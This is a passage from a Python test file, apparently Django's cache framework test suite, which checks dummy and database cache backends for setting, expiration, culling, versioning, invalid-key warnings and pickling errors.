'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.delete_many(['key with spaces'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertIsNone(cache.get_or_set('mykey', None))
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
# Some clients raise custom exceptions when .incr() or .decr() are called
# with a non-integer value.
incr_decr_type_error = TypeError
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertIs(caches['prefix'].has_key('somekey'), False)
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
cache.set_many({'x': None, 'y': 1})
self.assertEqual(cache.get_many(['x', 'y']), {'x': None, 'y': 1})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
self.assertIs(cache.delete("key1"), True)
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_delete_nonexistent(self):
self.assertIs(cache.delete('nonexistent_key'), False)
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), True)
self.assertIs(cache.has_key("goodbye1"), False)
cache.set("no_expiry", "here", None)
self.assertIs(cache.has_key("no_expiry"), True)
cache.set('null', None)
self.assertIs(cache.has_key('null'), True)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
cache.set('null', None)
self.assertIn('null', cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.incr('null')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.decr('null')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertIs(cache.has_key("expire3"), False)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
time.sleep(3)
self.assertIs(cache.has_key('expire1'), False)
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertIs(cache.delete(key), True)
self.assertIs(cache.add(key, value), True)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
self.assertIs(cache.delete(key), True)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
self.assertIs(cache.add('binary1-add', compressed_value), True)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1), True)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', None), True)
self.assertEqual(cache.get('key2'), 'ham')
self.assertIs(cache.add('key1', 'new eggs', None), False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
self.assertIs(cache.touch('key5', timeout=None), True)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
self.assertIs(cache.add('key2', 'ham', 0), True)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
self.assertIs(cache.touch('key5', timeout=0), True)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache_name, initial_count, final_count):
try:
cull_cache = caches[cull_cache_name]
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test('cull', 50, 29)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 19)
def test_cull_delete_when_store_empty(self):
try:
cull_cache = caches['cull']
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
old_max_entries = cull_cache._max_entries
# Force _cull to delete on first cached record.
cull_cache._max_entries = -1
try:
cull_cache.set('force_cull_delete', 'value', 1000)
self.assertIs(cull_cache.has_key('force_cull_delete'), True)
finally:
cull_cache._max_entries = old_max_entries
def _perform_invalid_key_test(self, key, expected_warning, key_func=None):
"""
All the builtin backends should warn (except memcached that should
error) on keys that would be refused by memcached. This encourages
portable caching code without making it too difficult to use production
backends with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = key_func or func
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
try:
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertWarns(CacheKeyWarning) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.warning), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_with_version_key_length(self):
# Custom make_key() that adds a version to the key and exceeds the
# limit.
def key_func(key, *args):
return key + ':1'
key = 'a' * 249
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key_func(key), 250)
)
self._perform_invalid_key_test(key, expected_warning, key_func=key_func)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
self.assertIs(cache.add('answer1', 42, version=2), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=2), False)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=1), True)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
self.assertIs(caches['v2'].add('answer2', 42), True)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37), False)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37, version=1), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
self.assertIs(caches['v2'].add('answer3', 42, version=1), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37, version=1), False)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertIs(cache.has_key('answer1'), True)
self.assertIs(cache.has_key('answer1', version=1), True)
self.assertIs(cache.has_key('answer1', version=2), False)
self.assertIs(caches['v2'].has_key('answer1'), False)
self.assertIs(caches['v2'].has_key('answer1', version=1), True)
self.assertIs(caches['v2'].has_key('answer1', version=2), False)
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertIs(cache.delete('answer1'), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertIs(cache.delete('answer2', version=2), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertIs(caches['v2'].delete('answer3'), True)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertIs(caches['v2'].delete('answer4', version=1), True)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertEqual(cache.incr('answer1'), 38)
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertEqual(cache.decr('answer1'), 37)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertEqual(cache.incr('answer2', version=2), 43)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
self.assertEqual(cache.decr('answer2', version=2), 42)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertEqual(caches['v2'].incr('answer3'), 43)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
self.assertEqual(caches['v2'].decr('answer3'), 42)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertEqual(caches['v2'].incr('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
self.assertEqual(caches['v2'].decr('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
cache.set('null', None)
self.assertEqual(cache.incr_version('null'), 2)
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
cache.set('null', None, version=2)
self.assertEqual(cache.decr_version('null', version=2), 1)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
fetch_middleware = FetchFromCacheMiddleware(empty_response)
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
content = 'Testing cookie serialization.'
def get_response(req):
response = HttpResponse(content)
response.set_cookie('foo', 'bar')
return response
update_middleware = UpdateCacheMiddleware(get_response)
update_middleware.cache = cache
response = update_middleware(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
UpdateCacheMiddleware(lambda req: get_cache_data)(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertIsNone(cache.get_or_set('null', None))
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
self.assertIsNone(cache.get_or_set('null', lambda: None))
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
